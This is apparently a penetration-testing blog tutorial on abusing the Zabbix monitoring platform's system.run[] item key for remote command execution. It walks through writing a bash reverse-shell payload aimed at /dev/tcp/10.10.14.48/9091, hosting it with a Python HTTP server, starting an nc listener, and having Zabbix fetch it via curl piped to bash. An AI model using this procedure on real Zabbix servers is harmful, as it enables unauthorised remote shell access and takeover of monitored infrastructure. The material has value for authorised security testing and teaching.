Exploit Zabbix for Reverse Shell

Penentration Test Leave a comment

Hi Brother,

I am sorry that I can just update this blog with another tutorial. Today, I am going to write a tutorial on exploiting zabbix functionality to initiate remote command execution. We can weaponize this functionality to get a reverse shell

What is Zabbix

For those who dont have any idea on what is zabbix then you can visit this website https://www.zabbix.com/. Basically zabbix is a monitoring platform that you can integrate with many other technology.

Zabbix’s Item

Item is an object that responsible to collect data from the end host. When you are in the zabbix pannel then you can go to the Host and select the host that you want to see the detail

Exploiting Item

As we know that Item is the one that responsible to collect the information of the endpoint. There are many useful feature that Item can do in order to get information. You can finnd them in the key details. You can explore them from this menu

One of the interesting Key is allowing us to run command on the Zabbix server which is system.run[]

We can exploit the above feature to run our payload on the zabbix server. With the below command basically that it will run curl and connect to our attacking server and open index.html by default where the output of the index.html will be piped to bash

With the above condition then we can do the step below to allow the reverse shell to happen

Write Payload

Create the index.html and put our reverse shell payload. You can execute this command on your terminal console to write the payload into index.html

echo '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.48/9091 0>&1"' > index.html

Run HTTP Server

As the zabbix item will connect to our http server using curl and fetch the index.html to get our payload then we need to run below command to initiate python http server

─$ python -m http.server 80                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

Start Shell Listerner

You need to start a listener to receive the reverse shell callback with the command below

└─$ rlwrap nc -lnvp 9091
listening on [any] 9091 ...

Run the exploit in Zabbix Item

You need to create a new item for the zabbix and put the payload that I mentioned earlier in the “Key” field

To execute the command above, then you need to press the “Test” button that is place on the bottom of the page

The next things to do is to push the “Get value and test” button to run execute the curl command on the zabbix server

As you can see that when you press the get value button then it connects to the http server because of curl is triggered. When the index.html has been read and the payload in the index.html is piped to bash to chain the execution to run the payload directly where eventually the reverse connection is established as shown in the picture 3

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s